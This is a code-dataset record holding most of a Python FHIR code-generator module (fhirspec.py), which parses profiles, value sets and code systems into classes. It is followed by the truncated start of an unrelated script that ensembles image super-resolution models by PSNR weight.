def handle_manual_profiles(self):\n \"\"\" Creates in-memory representations for all our manually defined\n profiles.\n \"\"\"\n for manual_profile in self.generator_config.manual_profiles:\n for contained in manual_profile.contains:\n profile = FHIRStructureDefinition(self, None)\n profile.manual_module = manual_profile.module\n\n prof_dict = {\n \"name\": contained,\n \"differential\": {\"element\": [{\"path\": contained}]},\n }\n\n profile.structure = FHIRStructureDefinitionStructure(profile, prof_dict)\n if self.found_profile(profile):\n profile.process_profile()\n\n def finalize(self):\n \"\"\" Should be called after all profiles have been parsed and allows\n to perform additional actions, like looking up class implementations\n from different profiles.\n \"\"\"\n for _, prof in self.profiles.items():\n prof.finalize()\n\n # MARK: Naming Utilities\n\n def as_module_name(self, name: str) -> str:\n if self.generator_config.naming_rules.resource_modules_lowercase:\n return name.lower()\n else:\n return name\n\n def as_class_name(\n self, classname: Optional[str], parent_name: Optional[str] = None\n ) -> Optional[str]:\n \"\"\" This method formulates a class name from the given arguments,\n applying formatting according to config.\n \"\"\"\n if classname is None or len(classname) == 0:\n return None\n\n classmap = self.generator_config.mapping_rules.classmap\n\n if parent_name is not None:\n # if we have a parent, do we have a mapped class?\n pathname = f\"{parent_name}.{classname}\"\n if pathname in classmap:\n return classmap[pathname]\n\n # is our plain class mapped?\n if classname in classmap:\n return classmap[classname]\n\n # CamelCase or just plain\n if self.generator_config.naming_rules.camelcase_classes:\n return stringcase.pascalcase(classname) # upper camelcase\n return classname\n\n def class_name_for_type(\n self, type_name: str, parent_name: Optional[str] = None\n ) -> Optional[str]:\n return self.as_class_name(type_name, parent_name)\n\n def class_name_for_type_if_property(self, type_name: str) -> Optional[str]:\n classname = self.class_name_for_type(type_name)\n if not classname:\n return None\n return self.generator_config.mapping_rules.replacemap.get(classname, classname)\n\n def class_name_for_profile(\n self, profile_name: Optional[Union[List[str], str]]\n ) -> Optional[Union[List[Optional[str]], str]]:\n if not profile_name:\n return None\n # TODO need to figure out what to do with this later. Annotation author supports multiples types that caused this to fail\n if isinstance(profile_name, (list,)):\n classnames = []\n for name_part in profile_name:\n classnames.append(\n self.as_class_name(name_part.split(\"/\")[-1])\n ) # may be the full Profile URI, like http://hl7.org/fhir/Profile/MyProfile\n return classnames\n type_name = profile_name.split(\"/\")[\n -1\n ] # may be the full Profile URI, like http://hl7.org/fhir/Profile/MyProfile\n return self.as_class_name(type_name)\n\n def class_name_is_native(self, class_name: str) -> bool:\n return class_name in self.generator_config.mapping_rules.natives\n\n def safe_property_name(self, prop_name: str) -> str:\n return self.generator_config.mapping_rules.reservedmap.get(prop_name, prop_name)\n\n def safe_enum_name(self, enum_name: str, ucfirst: bool = False) -> str:\n assert enum_name, \"Must have a name\"\n\n name = self.generator_config.mapping_rules.enum_map.get(enum_name, enum_name)\n parts = re.split(r\"[\\W_]+\", name)\n\n # /!\\ \"CamelCase\" term here is misleading.\n # \"CamelCase\" is not opposed to \"snake_case\", at least here.\n # See tests to see real cases.\n if self.generator_config.naming_rules.camelcase_enums:\n name = \"\".join([n[:1].upper() + n[1:] for n in parts])\n if not ucfirst and name.upper() != name:\n name = name[:1].lower() + name[1:]\n else:\n # /!\\ This is not a real snakecase.\n # Is it a problem ? Ex: HTTPVerb remains HTTPVerb\n name = \"_\".join(parts)\n\n if re.match(r\"^\\d\", name):\n name = f\"_{name}\"\n\n return self.generator_config.mapping_rules.reservedmap.get(name, name)\n\n def json_class_for_class_name(self, class_name: str) -> str:\n return self.generator_config.mapping_rules.jsonmap.get(\n class_name, self.generator_config.mapping_rules.jsonmap_default\n )\n\n # MARK: Writing Data\n\n def writable_profiles(self):\n \"\"\" Returns a list of `FHIRStructureDefinition` instances.\n \"\"\"\n return [\n profile\n for profile in self.profiles.values()\n if profile.manual_module is None\n ]\n\n\nclass FHIRVersionInfo(object):\n \"\"\" The version of a FHIR specification.\n \"\"\"\n\n def __init__(self, spec, directory):\n self.spec = spec\n\n now = datetime.date.today()\n self.date = now.isoformat()\n self.year = now.year\n\n infofile = os.path.join(directory, \"version.info\")\n self.version = self.read_version(infofile)\n\n def read_version(self, filepath):\n assert os.path.isfile(filepath)\n with io.open(filepath, \"r\", encoding=\"utf-8\") as handle:\n for line in handle.readlines():\n if line.startswith(\"FhirVersion\"):\n return line.split(\"=\", 2)[1].strip()\n\n\nclass FHIRValueSetEnum(object):\n \"\"\" Holds on to parsed `FHIRValueSet` properties.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n restricted_to: List[str],\n value_set: \"FHIRValueSet\",\n is_codesystem_known: bool,\n ):\n self.name = name\n self.restricted_to = restricted_to if len(restricted_to) > 0 else None\n self.value_set = value_set\n self.is_codesystem_known = is_codesystem_known\n self.represents_class = True # required for FHIRClass compatibility\n self.module = name # required for FHIRClass compatibility\n self.name_if_class = name # required for FHIRClass compatibility\n self.superclass_name = None # required for FHIRClass compatibility\n self.path = None # required for FHIRClass compatibility\n\n @property\n def definition(self) -> \"FHIRValueSet\":\n return self.value_set\n\n def name_of_resource(self) -> None: # required for FHIRClass compatibility\n return None\n\n\nclass FHIRValueSet(object):\n \"\"\" Holds on to ValueSets bundled with the spec.\n \"\"\"\n\n def __init__(self, spec: \"FHIRSpec\", set_dict: Dict[str, Any]):\n self.spec = spec\n self.definition = set_dict\n self.url = set_dict.get(\"url\")\n self.dstu2_inlined_codesystem = self.definition.get(\"codeSystem\")\n if self.dstu2_inlined_codesystem is not None:\n self.dstu2_inlined_codesystem[\"url\"] = self.dstu2_inlined_codesystem[\n \"system\"\n ]\n self.dstu2_inlined_codesystem[\"content\"] = \"complete\"\n self.dstu2_inlined_codesystem[\"name\"] = self.definition.get(\"name\")\n self.dstu2_inlined_codesystem[\"description\"] = self.definition.get(\n \"description\"\n )\n\n self._enum: Optional[\"FHIRValueSetEnum\"] = None\n\n @property\n def short(self):\n return self.definition.get(\"title\")\n\n @property\n def formal(self):\n return self.definition.get(\"description\")\n\n @property\n def enum(self) -> Optional[FHIRValueSetEnum]:\n \"\"\" Returns FHIRValueSetEnum if this valueset can be represented by one.\n \"\"\"\n if self._enum is not None:\n return self._enum\n\n include = self.__safely_get_single_include()\n if include is None:\n return None\n\n system = include.get(\"system\")\n if system is None:\n return None\n\n # alright, this is a ValueSet with 1 include and a system, is there a CodeSystem?\n cs = self.spec.codesystem_with_uri(system)\n is_codesystem_known = True\n if cs is None or not cs.generate_enum:\n # If no CodeSystem is found, we build an unofficial enum\n # Example : system = \"http://unitsofmeasure.org\" is not defined in FHIR\n is_codesystem_known = False\n cs_name = \"unknown_codesystem_enum\"\n else:\n cs_name = cs.name\n\n # Restrict CodeSystem to subset of concepts\n restricted_to = []\n for concept in include.get(\"concept\", []):\n assert \"code\" in concept\n restricted_to.append(concept[\"code\"])\n\n self._enum = FHIRValueSetEnum(\n name=cs_name,\n restricted_to=restricted_to,\n value_set=self,\n is_codesystem_known=is_codesystem_known,\n )\n return self._enum\n\n def __safely_get_single_include(self) -> Optional[Dict[str, Any]]:\n include = None\n\n if self.dstu2_inlined_codesystem is not None:\n include = [self.dstu2_inlined_codesystem]\n else:\n compose = self.definition.get(\"compose\")\n if compose is None:\n msg = f\"Currently only composed ValueSets are supported. {self.definition}\"\n raise Exception(msg)\n if \"exclude\" in compose:\n msg = \"Not currently supporting 'exclude' on ValueSet\"\n raise Exception(msg)\n\n # \"import\" is for DSTU-2 compatibility\n include = compose.get(\"include\") or compose.get(\"import\") or []\n\n if len(include) != 1:\n logger.warning(\n f\"Ignoring ValueSet with more than 1 includes ({len(include)}: {include})\"\n )\n return None\n\n return include[0]\n\n\nclass FHIRCodeSystem(object):\n \"\"\" Holds on to CodeSystems bundled with the spec.\n \"\"\"\n\n def __init__(self, spec: FHIRSpec, resource):\n assert \"content\" in resource\n self.spec = spec\n self.definition = resource\n self.url = resource.get(\"url\")\n if self.url in self.spec.generator_config.mapping_rules.enum_namemap:\n self.name = self.spec.generator_config.mapping_rules.enum_namemap[self.url]\n else:\n self.name = self.spec.safe_enum_name(resource.get(\"name\"), ucfirst=True)\n if len(self.name) < 1:\n raise Exception(\n f\"Unable to create a name for enum of system {self.url}. You may need to specify a name explicitly in mappings.enum_namemap. Code system content: {resource}\"\n )\n self.description = resource.get(\"description\")\n self.valueset_url = resource.get(\"valueSet\")\n self.codes = None\n self.generate_enum = False\n concepts = resource.get(\"concept\", [])\n\n if resource.get(\"experimental\"):\n return\n\n if resource[\"content\"] == \"complete\":\n self.generate_enum = True\n\n if not self.generate_enum:\n logger.warning(\n f\"Will not generate enum for CodeSystem '{self.url}' whose content is {resource['content']}\"\n )\n return\n\n assert concepts, 'Expecting at least one code for \"complete\" CodeSystem'\n if len(concepts) > 200:\n self.generate_enum = False\n logger.info(\n f\"Will not generate enum for CodeSystem '{self.url}' because it has > 200 ({len(concepts)}) concepts\"\n )\n return\n\n self.codes = self.parsed_codes(concepts)\n\n def parsed_codes(self, codes, prefix=None):\n found = []\n for c in codes:\n if c[\"code\"][:1].isdigit():\n self.generate_enum = False\n logger.info(\n f\"Will not generate enum for CodeSystem '{self.url}' because at least one concept code starts with a number\"\n )\n return None\n\n cd = c[\"code\"]\n # name = (\n # \"{}-{}\".format(prefix, cd)\n # if prefix and not cd.startswith(prefix)\n # else cd\n # )\n code_name = self.spec.safe_enum_name(cd)\n if len(code_name) < 1:\n raise Exception(\n f\"Unable to create a member name for enum '{cd}' in {self.url}. You may need to add '{cd}' to mappings.enum_map\"\n )\n c[\"name\"] = code_name\n c[\"definition\"] = c.get(\"definition\") or c[\"name\"]\n found.append(c)\n\n # nested concepts?\n if \"concept\" in c:\n fnd = self.parsed_codes(c[\"concept\"])\n if fnd is None:\n return None\n found.extend(fnd)\n return found\n\n\nclass FHIRStructureDefinition(object):\n \"\"\" One FHIR structure definition.\n \"\"\"\n\n def __init__(self, spec, profile):\n self.manual_module = None\n self.spec = spec\n self.url = None\n self.targetname = None\n self.structure = None\n self.elements = None\n self.main_element = None\n self._class_map = {}\n self.classes: List[fhirclass.FHIRClass] = []\n self._did_finalize = False\n\n if profile is not None:\n self.parse_profile(profile)\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}> name: {self.name}, url: {self.url}\"\n\n @property\n def name(self):\n return self.structure.name if self.structure is not None else None\n\n def read_profile(self, filepath):\n \"\"\" Read the JSON definition of a profile from disk and parse.\n\n Not currently used.\n \"\"\"\n profile = None\n with io.open(filepath, \"r\", encoding=\"utf-8\") as handle:\n profile = json.load(handle)\n self.parse_profile(profile)\n\n def parse_profile(self, profile):\n \"\"\" Parse a JSON profile into a structure.\n \"\"\"\n assert profile\n assert \"StructureDefinition\" == profile[\"resourceType\"]\n\n # parse structure\n self.url = profile.get(\"url\")\n logger.info('Parsing profile \"{}\"'.format(profile.get(\"name\")))\n self.structure = FHIRStructureDefinitionStructure(self, profile)\n\n def process_profile(self):\n \"\"\" Extract all elements and create classes.\n \"\"\"\n struct = self.structure.differential # or self.structure.snapshot\n if struct is not None:\n mapped = {}\n self.elements = []\n for elem_dict in struct:\n element = FHIRStructureDefinitionElement(\n self, elem_dict, self.main_element is None\n )\n self.elements.append(element)\n mapped[element.path] = element\n\n # establish hierarchy (may move to extra loop in case elements are no longer in order)\n if element.is_main_profile_element:\n self.main_element = element\n parent = mapped.get(element.parent_name)\n if parent:\n parent.add_child(element)\n\n # resolve element dependencies\n for element in self.elements:\n element.resolve_dependencies()\n\n # run check: if n_min > 0 and parent is in summary, must also be in summary\n for element in self.elements:\n if element.n_min is not None and element.n_min > 0:\n if (\n element.parent is not None\n and element.parent.is_summary\n and not element.is_summary\n ):\n logger.error(\n \"n_min > 0 but not summary: `{}`\".format(element.path)\n )\n element.summary_n_min_conflict = True\n\n # create classes and class properties\n if self.main_element is not None:\n snap_class, subs = self.main_element.create_class()\n if snap_class is None:\n raise Exception(\n 'The main element for \"{}\" did not create a class'.format(self.url)\n )\n\n self.found_class(snap_class)\n for sub in subs:\n self.found_class(sub)\n self.targetname = snap_class.name\n\n def element_with_id(self, ident):\n \"\"\" Returns a FHIRStructureDefinitionElementDefinition with the given\n id, if found. Used to retrieve elements defined via `contentReference`.\n \"\"\"\n if self.elements is not None:\n for element in self.elements:\n if element.definition.id == ident:\n return element\n return None\n\n def dstu2_element_with_name(self, name):\n \"\"\" Returns a FHIRStructureDefinitionElementDefinition with the given\n name, if found. Used to retrieve elements defined via `nameReference`\n used in DSTU-2.\n \"\"\"\n if self.elements is not None:\n for element in self.elements:\n if element.definition.name == name:\n return element\n return None\n\n # MARK: Class Handling\n\n def found_class(self, klass):\n self.classes.append(klass)\n\n def needed_external_classes(self):\n \"\"\" Returns a unique list of class items that are needed for any of the\n receiver's classes' properties and are not defined in this profile.\n\n :raises: Will raise if called before `finalize` has been called.\n \"\"\"\n if not self._did_finalize:\n raise Exception(\"Cannot use `needed_external_classes` before finalizing\")\n\n internal = set([c.name for c in self.classes])\n needed = set()\n needs = []\n\n for klass in self.classes:\n # are there superclasses that we need to import?\n sup_cls = klass.superclass\n if (\n sup_cls is not None\n and sup_cls.name not in internal\n and sup_cls.name not in needed\n ):\n needed.add(sup_cls.name)\n needs.append(sup_cls)\n\n # look at all properties' classes and assign their modules\n for prop in klass.properties:\n prop_cls_name = prop.class_name\n if prop.enum is not None:\n enum_cls, did_create = fhirclass.FHIRClass.for_element(prop.enum)\n enum_cls.module = prop.enum.name\n prop.module_name = enum_cls.module\n if enum_cls.name not in needed:\n needed.add(enum_cls.name)\n needs.append(enum_cls)\n\n elif (\n prop_cls_name not in internal\n and not self.spec.class_name_is_native(prop_cls_name)\n ):\n prop_cls = fhirclass.FHIRClass.with_name(prop_cls_name)\n if prop_cls is None:\n raise Exception(\n 'There is no class \"{}\" for property \"{}\" on \"{}\" in {}'.format(\n prop_cls_name, prop.name, klass.name, self.name\n )\n )\n else:\n prop.module_name = prop_cls.module\n if prop_cls_name not in needed:\n needed.add(prop_cls_name)\n needs.append(prop_cls)\n\n return sorted(needs, key=lambda n: n.module or n.name)\n\n def referenced_classes(self):\n \"\"\" Returns a unique list of **external** class names that are\n referenced from at least one of the receiver's `Reference`-type\n properties.\n\n :raises: Will raise if called before `finalize` has been called.\n \"\"\"\n if not self._did_finalize:\n raise Exception(\"Cannot use `referenced_classes` before finalizing\")\n\n references = set()\n for klass in self.classes:\n for prop in klass.properties:\n if len(prop.reference_to_names) > 0:\n references.update(prop.reference_to_names)\n\n # no need to list references to our own classes, remove them\n for klass in self.classes:\n references.discard(klass.name)\n\n return sorted(references)\n\n def writable_classes(self):\n return [klass for klass in self.classes if klass.should_write()]\n\n # MARK: Finalizing\n\n def finalize(self):\n \"\"\" Our spec object calls this when all profiles have been parsed.\n \"\"\"\n\n # assign all super-classes as objects\n for cls in self.classes:\n if cls.superclass is None:\n super_cls = fhirclass.FHIRClass.with_name(cls.superclass_name)\n if super_cls is None and cls.superclass_name is not None:\n raise Exception(\n 'There is no class implementation for class named \"{}\" in profile \"{}\"'.format(\n cls.superclass_name, self.url\n )\n )\n else:\n cls.superclass = super_cls\n\n self._did_finalize = True\n\n\nclass FHIRStructureDefinitionStructure(object):\n \"\"\" The actual structure of a complete profile.\n \"\"\"\n\n def __init__(self, profile, profile_dict):\n self.profile = profile\n self.name = None\n self.base = None\n self.kind = None\n self.subclass_of = None\n self.snapshot = None\n self.differential = None\n\n self.parse_from(profile_dict)\n\n def parse_from(self, json_dict):\n name = json_dict.get(\"name\")\n if not name:\n raise Exception(\"Must find 'name' in profile dictionary but found nothing\")\n self.name = self.profile.spec.class_name_for_profile(name)\n self.base = json_dict.get(\"baseDefinition\")\n self.kind = json_dict.get(\"kind\")\n if self.base:\n self.subclass_of = self.profile.spec.class_name_for_profile(self.base)\n\n # find element definitions\n if \"snapshot\" in json_dict:\n self.snapshot = json_dict[\"snapshot\"].get(\"element\", [])\n if \"differential\" in json_dict:\n self.differential = json_dict[\"differential\"].get(\"element\", [])\n\n\nclass FHIRStructureDefinitionElement(object):\n \"\"\" An element in a profile's structure.\n \"\"\"\n\n def __init__(self, profile, element_dict, is_main_profile_element=False):\n assert isinstance(profile, FHIRStructureDefinition)\n self.profile = profile\n self.path = None\n self.parent = None\n self.children = None\n self.parent_name = None\n self.definition = None\n self.n_min = None\n self.n_max = None\n self.is_summary = False\n # to mark conflicts, see #13215 (http://gforge.hl7.org/gf/project/fhir/tracker/?action=TrackerItemEdit&tracker_item_id=13125)\n self.summary_n_min_conflict = False\n self.valueset = None\n self.enum = None # assigned if the element has a binding to a ValueSet that is a CodeSystem generating an enum\n\n self.is_main_profile_element = is_main_profile_element\n self.represents_class = False\n\n self._superclass_name = None\n self._name_if_class = None\n self._did_resolve_dependencies = False\n\n if element_dict is not None:\n self.parse_from(element_dict)\n else:\n self.definition = FHIRStructureDefinitionElementDefinition(self, None)\n\n def parse_from(self, element_dict):\n self.path = element_dict[\"path\"]\n parts = self.path.split(\".\")\n self.parent_name = \".\".join(parts[:-1]) if len(parts) > 0 else None\n prop_name = parts[-1]\n if \"-\" in prop_name:\n prop_name = \"\".join([n[:1].upper() + n[1:] for n in prop_name.split(\"-\")])\n\n self.definition = FHIRStructureDefinitionElementDefinition(self, element_dict)\n self.definition.prop_name = prop_name\n\n self.n_min = element_dict.get(\"min\")\n self.n_max = element_dict.get(\"max\")\n self.is_summary = element_dict.get(\"isSummary\")\n\n def resolve_dependencies(self):\n if self.is_main_profile_element:\n self.represents_class = True\n if (\n not self.represents_class\n and self.children is not None\n and len(self.children) > 0\n ):\n self.represents_class = True\n if self.definition is not None:\n self.definition.resolve_dependencies()\n\n self._did_resolve_dependencies = True\n\n # MARK: Hierarchy\n\n def add_child(self, element):\n assert isinstance(element, FHIRStructureDefinitionElement)\n element.parent = self\n if self.children is None:\n self.children = [element]\n else:\n self.children.append(element)\n\n def create_class(self, module=None):\n \"\"\" Creates a FHIRClass instance from the receiver, returning the\n created class as the first and all inline defined subclasses as the\n second item in the tuple.\n \"\"\"\n assert self._did_resolve_dependencies\n if not self.represents_class:\n return None, None\n\n subs = []\n cls, did_create = fhirclass.FHIRClass.for_element(self)\n if did_create: # manual_profiles\n if module is None:\n if self.profile.manual_module is not None:\n module = self.profile.manual_module\n elif self.is_main_profile_element:\n module = self.profile.spec.as_module_name(cls.name)\n cls.module = module\n logger.debug('Created class \"{}\", module {}'.format(cls.name, module))\n\n # child classes\n if self.children is not None:\n for child in self.children:\n properties = child.as_properties()\n if properties is not None:\n\n # collect subclasses\n sub, subsubs = child.create_class(module)\n if sub is not None:\n subs.append(sub)\n if subsubs is not None:\n subs.extend(subsubs)\n\n # add properties to class\n if did_create:\n for prop in properties:\n cls.add_property(prop)\n\n return cls, subs\n\n def as_properties(self):\n \"\"\" If the element describes a *class property*, returns a list of\n FHIRClassProperty instances, None otherwise.\n \"\"\"\n assert self._did_resolve_dependencies\n if self.is_main_profile_element or self.definition is None:\n return None\n\n # TODO: handle slicing information (not sure why these properties were\n # omitted previously)\n # if self.definition.slicing:\n # logger.debug('Omitting property \"{}\" for slicing'.format(self.definition.prop_name))\n # return None\n\n # this must be a property\n if self.parent is None:\n raise Exception(\n 'Element reports as property but has no parent: \"{}\"'.format(self.path)\n )\n\n # create a list of FHIRClassProperty instances (usually with only 1 item)\n if len(self.definition.types) > 0:\n props = []\n for type_obj in self.definition.types:\n\n # an inline class\n if (\n \"BackboneElement\" == type_obj.code or \"Element\" == type_obj.code\n ): # data types don't use \"BackboneElement\"\n props.append(\n fhirclass.FHIRClassProperty(self, type_obj, self.name_if_class)\n )\n # TODO: look at http://hl7.org/fhir/StructureDefinition/structuredefinition-explicit-type-name ?\n else:\n props.append(fhirclass.FHIRClassProperty(self, type_obj))\n return props\n\n # no `type` definition in the element: it's a property with an inline class definition\n type_obj = FHIRElementType()\n return [fhirclass.FHIRClassProperty(self, type_obj, self.name_if_class)]\n\n # MARK: Name Utils\n\n def name_of_resource(self):\n assert self._did_resolve_dependencies\n if (\n not self.is_main_profile_element\n or self.profile.structure.kind is None\n or self.profile.structure.kind != \"resource\"\n ):\n return None\n return self.profile.name\n\n @property\n def name_if_class(self):\n if self._name_if_class is None:\n self._name_if_class = self.definition.name_if_class()\n return self._name_if_class\n\n @property\n def superclass_name(self):\n \"\"\" Determine the superclass for the element (used for class elements).\n \"\"\"\n if self._superclass_name is None:\n tps = self.definition.types\n if len(tps) > 1:\n raise Exception(\n 'Have more than one type to determine superclass in \"{}\": \"{}\"'.format(\n self.path, tps\n )\n )\n type_code = None\n\n if (\n self.is_main_profile_element\n and self.profile.structure.subclass_of is not None\n ):\n type_code = self.profile.structure.subclass_of\n elif len(tps) > 0:\n type_code = tps[0].code\n elif self.profile.structure.kind:\n type_code = self.profile.spec.generator_config.default_base[\n self.profile.structure.kind\n ]\n self._superclass_name = self.profile.spec.class_name_for_type(type_code)\n\n return self._superclass_name\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}> path: {self.path}\"\n\n\nclass FHIRStructureDefinitionElementDefinition(object):\n \"\"\" The definition of a FHIR element.\n \"\"\"\n\n def __init__(self, element, definition_dict):\n self.id = None\n self.element = element\n self.types = []\n self.name = None\n self.prop_name = None\n self.content_reference = None\n self._content_referenced = None\n self.short = None\n self.formal = None\n self.comment = None\n self.binding = None\n self.constraint = None\n self.mapping = None\n self.slicing = None\n self.representation = None\n # TODO: extract \"defaultValue[x]\", \"fixed[x]\", \"pattern[x]\"\n # TODO: handle \"slicing\"\n\n if definition_dict is not None:\n self.parse_from(definition_dict)\n\n def parse_from(self, definition_dict):\n self.id = definition_dict.get(\"id\")\n self.types = []\n for type_dict in definition_dict.get(\"type\", []):\n self.types.append(FHIRElementType(type_dict))\n\n self.name = definition_dict.get(\"name\")\n self.content_reference = definition_dict.get(\"contentReference\")\n self.dstu2_name_reference = definition_dict.get(\"nameReference\")\n\n self.short = definition_dict.get(\"short\")\n self.formal = definition_dict.get(\"definition\")\n if (\n self.formal and self.short == self.formal[:-1]\n ): # formal adds a trailing period\n self.formal = None\n self.comment = definition_dict.get(\"comments\")\n\n if \"binding\" in definition_dict:\n self.binding = FHIRElementBinding(definition_dict[\"binding\"])\n if \"constraint\" in definition_dict:\n self.constraint = FHIRElementConstraint(definition_dict[\"constraint\"])\n if \"mapping\" in definition_dict:\n self.mapping = FHIRElementMapping(definition_dict[\"mapping\"])\n if \"slicing\" in definition_dict:\n self.slicing = definition_dict[\"slicing\"]\n self.representation = definition_dict.get(\"representation\")\n\n def resolve_dependencies(self):\n # update the definition from a reference, if there is one\n if self.content_reference is not None:\n if \"#\" != self.content_reference[:1]:\n raise Exception(\n \"Only relative 'contentReference' element definitions are supported right now\"\n )\n elem = self.element.profile.element_with_id(self.content_reference[1:])\n if elem is None:\n raise Exception(\n f'There is no element definiton with id \"{self.content_reference}\", as referenced by {self.path} in {self.profile.url}'\n )\n self._content_referenced = elem.definition\n elif self.dstu2_name_reference is not None: # DSTU-2 backwards-compatibility\n elem = self.element.profile.dstu2_element_with_name(\n self.dstu2_name_reference\n )\n if elem is None:\n raise Exception(\n f'There is no element definiton with name \"{self.dstu2_name_reference}\", as referenced by {self.path} in {self.profile.url}'\n )\n self._content_referenced = elem.definition\n\n # resolve bindings\n if (\n self.binding is not None\n and self.binding.is_required\n and self.binding.has_valueset\n ):\n uri = self.binding.valueset_uri\n if not uri.startswith(\"http://hl7.org/fhir\"):\n logger.debug('Ignoring foreign ValueSet \"{}\"'.format(uri))\n return\n\n # remove version from canonical URI, if present, e.g. \"http://hl7.org/fhir/ValueSet/name-use|4.0.0\"\n uri = uri.split(\"|\")[0]\n\n valueset = self.element.profile.spec.valueset_with_uri(uri)\n if valueset is None:\n logger.error(\n 'There is no ValueSet for required binding \"{}\" on {} in {}'.format(\n uri, self.name or self.prop_name, self.element.profile.name\n )\n )\n else:\n self.element.valueset = valueset\n self.element.enum = valueset.enum\n\n def name_if_class(self):\n \"\"\" Determines the class-name that the element would have if it was\n defining a class. This means it uses \"name\", if present, and the last\n \"path\" component otherwise. It also detects if the definition is a\n reference and will re-use the class name defined by the referenced\n element (such as `ValueSet.codeSystem.concept.concept`).\n \"\"\"\n\n # This Element is a reference, pick up the original name\n if self._content_referenced is not None:\n return self._content_referenced.name_if_class()\n\n with_name = self.name or self.prop_name\n parent_name = (\n self.element.parent.name_if_class\n if self.element.parent is not None\n else None\n )\n classname = self.element.profile.spec.class_name_for_type(\n with_name, parent_name\n )\n if (\n parent_name is not None\n and self.element.profile.spec.generator_config.naming_rules.backbone_class_adds_parent\n ):\n classname = parent_name + classname\n return classname\n\n\nclass FHIRElementType(object):\n \"\"\"Representing a type of an element.\n\n https://www.hl7.org/fhir/element.html\n \"\"\"\n\n def __init__(self, type_dict=None):\n self.code = None\n self.profile = None\n\n if type_dict is not None:\n self.parse_from(type_dict)\n\n def parse_from(self, type_dict):\n self.code = type_dict.get(\"code\")\n\n # Look for the \"structuredefinition-fhir-type\" extension, introduced after R4\n ext_type = type_dict.get(\"extension\")\n\n # http://hl7.org/fhir/2020Feb/extensibility.html#Extension\n if ext_type is not None:\n fhir_ext = [\n e\n for e in ext_type\n if e.get(\"url\")\n == \"http://hl7.org/fhir/StructureDefinition/structuredefinition-fhir-type\"\n ]\n if len(fhir_ext) == 1: # This may hit after R4\n if \"valueUri\" in fhir_ext[0]:\n self.code = fhir_ext[0].get(\"valueUri\")\n if \"valueUrl\" in fhir_ext[0]:\n self.code = fhir_ext[0].get(\"valueUrl\")\n\n # This may hit on R4 or earlier\n ext_code = type_dict.get(\"_code\")\n if self.code is None and ext_code is not None:\n json_ext = [\n e\n for e in ext_code.get(\"extension\", [])\n if e.get(\"url\")\n == \"http://hl7.org/fhir/StructureDefinition/structuredefinition-json-type\"\n ]\n if len(json_ext) < 1:\n raise Exception(\n f'Expecting either \"code\" or \"_code\" and a JSON type extension, found neither in {type_dict}'\n )\n if len(json_ext) > 1:\n raise Exception(\n f\"Found more than one structure definition JSON type in {type_dict}\"\n )\n self.code = json_ext[0].get(\"valueString\")\n\n if self.code is None:\n raise Exception(f\"No element type code found in {type_dict}\")\n if not isinstance(self.code, str):\n raise Exception(\n \"Expecting a string for 'code' definition of an element type, got {} as {}\".format(\n self.code, type(self.code)\n )\n )\n if not isinstance(type_dict.get(\"targetProfile\"), (list,)):\n self.profile = type_dict.get(\"targetProfile\")\n if (\n self.profile is not None\n and not isinstance(self.profile, str)\n and not isinstance(type_dict.get(\"targetProfile\"), (list,))\n ): # Added a check to make sure the targetProfile wasn't a list\n raise Exception(\n \"Expecting a string for 'targetProfile' definition of an element type, got {} as {}\".format(\n self.profile, type(self.profile)\n )\n )\n\n\nclass FHIRElementBinding(object):\n \"\"\" The \"binding\" element in an element definition\n \"\"\"\n\n def __init__(self, binding_obj):\n self.strength = binding_obj.get(\"strength\")\n self.description = binding_obj.get(\"description\")\n self.valueset = binding_obj.get(\"valueSet\")\n self.legacy_uri = binding_obj.get(\"valueSetUri\")\n self.legacy_canonical = binding_obj.get(\"valueSetCanonical\")\n self.dstu2_reference = binding_obj.get(\"valueSetReference\", {}).get(\"reference\")\n self.is_required = \"required\" == self.strength\n\n @property\n def has_valueset(self):\n return self.valueset_uri is not None\n\n @property\n def valueset_uri(self):\n return (\n self.valueset\n or self.legacy_uri\n or self.legacy_canonical\n or self.dstu2_reference\n )\n\n\nclass FHIRElementConstraint(object):\n \"\"\" Constraint on an element.\n \"\"\"\n\n def __init__(self, constraint_arr):\n pass\n\n\nclass FHIRElementMapping(object):\n \"\"\" Mapping FHIR to other standards.\n \"\"\"\n\n def __init__(self, mapping_arr):\n pass\n","sub_path":"fhirzeug/fhirspec.py","file_name":"fhirspec.py","file_ext":"py","file_size_in_byte":45430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307075980","text":"from FAWDN.test import main as FAWDN\nimport cv2\nimport multiprocessing as mp\nimport os\nfrom multiprocessing import Process\nimport numpy as np\nfrom FAWDN.utils import util\nimport csv\nimport time\nimport pickle\n\ndef start_FAWDN(lrpath, hrpath, modelpath,modelresulsts, modelnames, modelpsnr):\n # starts the fawdn test.py script and saves the results and which model produced them in lists\n srimages, srpsnr = FAWDN(lrpath, hrpath,modelpath)\n modelresulsts.append(srimages)\n modelpsnr.append(srpsnr)\n modelnames.append(modelpath.rsplit('/',1)[1]) #keeps track of when the models finished\n\ndef compute_weigths(path_to_jsonfolder):\n # finds the cvs files in the directory and means the psnr values for each file\n excelfiles = [excel for excel in os.listdir(path_to_jsonfolder) if excel.endswith('.csv')]\n meanpsnr=[]\n for file in excelfiles:\n filepsnr=[]\n with open(path_to_jsonfolder+\"/\"+file, mode='r', encoding=\"utf8\") as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n if row is not None:\n filepsnr.append(row[\"psnr\"])\n filepsnr = np.array(filepsnr).astype(np.float)\n t = np.mean(filepsnr),file\n meanpsnr.append(t)\n\n return meanpsnr # contains a list of (meanpsnr, modelname) for each csv file\n\n\n\ndef sortweigths(weigths, modelnames):\n # matches the results of models with their weigths, so the weights appear in the order the models finished in\n sortedweigths=[]\n for n1 in modelnames:\n #n1 = first_word(n1, 1)\n n1 = n1.rsplit('.',1)[0]\n for i in range(0, len(weigths)):\n n2 = weigths[i][1]\n #n2 = first_word(n2, 1)\n n2 = n2.rsplit('_',1)[0]\n\n if n1 == n2:\n sortedweigths.append(weigths[i][0])\n break\n elif i==len(weigths):\n print(\"did not match a csv file with model\", n1,\". Make sure csv file is named _records.csv\")\n return sortedweigths\n\ndef average_ensemble(sortedweigths, images):\n # average the models images together based on the weight of each model\n norm_psnr = []\n\n for value in sortedweigths:\n y = value / (np.amax(sortedweigths))\n norm_psnr.append(y)\n imgs = np.array(images)\n print(norm_psnr)\n print(modelnames)\n mean_img = 